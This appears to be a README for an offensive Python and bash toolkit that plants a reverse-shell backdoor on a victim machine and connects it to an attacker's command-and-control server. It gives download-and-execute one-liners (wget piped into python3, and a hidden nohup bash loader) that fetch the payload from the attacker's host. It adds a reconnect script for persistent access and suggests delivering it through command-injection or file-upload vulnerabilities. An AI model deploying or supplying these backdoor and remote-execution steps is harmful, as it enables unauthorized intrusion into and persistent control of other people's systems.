By running one script on the attack machine and by injecting one command into the client's terminal - a backdoor will be deployed on the client machine opening up a reverse shell. [CNC - Command and Control script]
- => Runs on the server system.
- This file is to be ran on the CNC server system and listens for incoming connections made by an exploited machine via the client_payload script.
- Once a connected is established - this acts as a reverse shell and executes commands on the client system. [Reverse shell Backdoor]
- => Runs on the client syste,.
- This file initiates a connection from the host system to the CNC server machine (hacker machine).
- This is intended to be downloaded/executed on a victim machine.
- This file assumes python3 is installed. [Client Helper script - BASH]
- => Runs on the client system.
- This file is a helper to the client_payload script.
- The goal here is to make sure if a connection is dropped - a new one will be re-initiated - allowing the CNC server to have realiable access to client machine.
- Write this as bash script so most of the commands here are directly communicating at the command line level. [Helper script - BASH]
- => To run on server system
- Prints on screen-instructions asking for the ip/port details of the CMC server (hacker machine) and where the client_payload is to be hosted.
- This scrpt also edits the,, and to reflected the command line input.
- Finally, this script tells you exactly which commands to run on CNC server and client machine to initiate a reverse shell (backdoor) attack.
Note: With all methods - there needs to be a way to run a command on the client machine to kick-off the connection to the CNC server (hacker's machine). There is more than one way to do this - but would be good to find a straight-forward vulnerability such a a command line injection if possible.
Run startup script
Then follow on screen instructions.
(works with cmd line injection)
- [SERVER] Host somehere
- One option is to start a python web server on the cnc_server
python3 -m http.server 8080
- [CLIENT] Download + Execute from client machine
wget -O - <cnc_server_ip>:8080/ | python3
- [OPTIONAL] Once you have a connection to client from cnc server...
- Download + Execute the script (keeps reconnects the client if it disconnects)
- CNC server could host the script.
- This file must first be edited to match the host/port details you already have in use.
wget -q <cnc_server_ip>:8080/ &> /dev/null ;
bash &> /dev/null &
- One-Liner
{ wget -q -O .c <cnc_server_ip>:8080/ ; } && { nohup bash .c &> /dev/null & }
- Make sure you exit from CNC server with 'exit' to disconnect properly.
<- edit the file to use the port you want or pass it in as an argument (default 8000). - [CLIENT]
<- edit the file to use the CNC server IP and port you want. -
- Or pass them in as an argumenta (default port 8000)
python3 <cnc_server_ip> <cnc_server_port>
You could also exploit a file upload vulnerability of aa web application and upload the client_payload file onto the victim's machine. Just make sure you listen on sever and manage a way to run the script on the client machine.
Both client_payload and server_shell scripts communicate on port 8000 by default. This can be changed to another port - but you would need to make sure both scripts have the same port..